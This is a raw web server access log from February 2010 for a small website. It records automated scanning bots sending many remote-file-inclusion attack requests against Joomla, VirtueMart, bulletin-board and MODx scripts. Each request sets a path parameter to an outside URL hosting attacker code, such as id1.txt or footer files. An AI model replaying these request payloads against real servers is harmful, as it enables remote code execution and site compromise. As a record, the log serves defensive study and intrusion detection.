203.251.80.167 - - [06/Feb/2010:05:05:27 -0800] "GET /logs/access_100116.log//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:27 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:34 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:05:37 -0800] "GET /?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:05:37 -0800] "GET /logs//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:05:37 -0800] "GET /logs/access_100123.log//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:46 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:46 -0800] "GET /logs/access_100116.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:46 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.251.80.167 - - [06/Feb/2010:05:05:54 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.festselection.de//components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:06:25 -0800] "GET /logs/access_100123.log%20%20//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:06:25 -0800] "GET /logs//?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1229 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
195.190.166.35 - - [06/Feb/2010:05:06:25 -0800] "GET /?sIncPath=http://musicadelibreria.net/footer?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:06:27 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:06:36 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:06:36 -0800] "GET /logs/access.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:06:36 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:06:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:06:38 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:06:38 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:06:38 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:53 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:53 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:53 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:59 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:59 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:06:59 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.239.227.34 - - [06/Feb/2010:05:07:08 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.qqe.ru//forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:11 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:46 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:47 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:50 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.131 - - [06/Feb/2010:05:08:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:09:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:05:09:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
222.237.78.176 - - [06/Feb/2010:05:09:20 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:09:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.78.109.87 - - [06/Feb/2010:05:09:34 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.78.109.87 - - [06/Feb/2010:05:09:34 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.78.109.87 - - [06/Feb/2010:05:09:35 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:36 -0800] "GET /logs/access_091121.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:36 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:36 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:09:47 -0800] "GET /logs/access_091121.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:09:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:09:47 -0800] "GET /logs/access_091121.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:09:47 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:49 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:49 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:09:49 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
61.78.109.87 - - [06/Feb/2010:05:11:07 -0800] "GET /logs/access_091121.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:09 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:09 -0800] "GET /logs/access_091121.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:10 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:16 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:16 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:12:16 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:12:30 -0800] "GET /logs/access_091121.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:16 -0800] "GET /logs/access_091121.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:16 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:16 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:16:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:16:25 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:16:25 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:25 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:25 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:25 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:16:36 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /logs/access_091121.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
211.192.139.164 - - [06/Feb/2010:05:16:56 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:17:13 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:17:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:17:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.50.85.229 - - [06/Feb/2010:05:17:22 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:19:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:06 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:06 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:06 -0800] "GET /logs/access_100116.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:07 -0800] "GET /logs/access_100116.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:07 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:07 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:53 -0800] "GET /logs/access_100116.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:53 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:21:53 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:22:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:22:38 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:22:38 -0800] "GET /logs/access_091121.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
66.103.128.44 - - [06/Feb/2010:05:24:24 -0800] "GET /logs/access_100116.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:24:40 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:24:44 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [06/Feb/2010:05:25:32 -0800] "GET /logs/access_091121.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:25:50 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:26:44 -0800] "GET /logs/access_091121.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:04 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:07 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:07 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:28:09 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:30:27 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:30:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.241.52.111 - - [06/Feb/2010:05:30:27 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
